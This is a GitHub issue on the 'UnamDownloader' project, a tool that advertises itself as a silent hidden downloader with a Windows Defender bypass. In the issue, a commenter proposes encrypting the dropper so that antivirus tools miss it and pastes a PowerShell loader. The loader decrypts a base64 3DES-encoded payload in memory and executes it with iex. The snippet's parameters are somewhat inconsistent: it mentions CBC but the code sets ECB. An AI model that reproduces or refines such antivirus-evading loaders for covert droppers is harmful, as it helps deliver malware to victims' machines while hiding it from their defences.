UnamSanctam / UnamDownloader

A Free Silent (Hidden) Open Source Downloader (Binder) - Includes Windows Defender Bypass - Build Native - Unam Downloader
MIT License

Suggestion #48

Open 0xcreston opened 1 year ago

0xcreston commented 1 year ago

I would like you to make the dropper encrypted with aes-256 or 3des-192-cbc to evade AVs. It would be something like this:

$key = [Convert]::FromBase64String("xKc6APq4mM0xAjMg6TETedOZKqugeZYB") $iv = [Convert]::FromBase64String("pVglsY0BHNk=") $Payload = "YxNjPvngQ3g="; $TDES = New-Object "System.Security.Cryptography.TripleDESCryptoServiceProvider"; $TDES.Mode = [System.Security.Cryptography.CipherMode]::ECB; $TDES.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $TDES.BlockSize = 64; $TDES.KeySize = 192; $DataByte = [Convert]::FromBase64String($Payload) $MS = New-Object System.IO.MemoryStream(,$DataByte) $CS = New-Object System.Security.Cryptography.CryptoStream($MS,$TDES.CreateDecryptor($Key,$IV), [System.Security.Cryptography.CryptoStreamMode]::Read) $Reader = New-Object System.IO.StreamReader($CS) $Result = $Reader.ReadToEnd() $Reader.Dispose() iex($Result)

I don't know much about encryption, just making a suggestion that might reduce the AV detection rate of the dropper, since PowerShell is used to download the payload.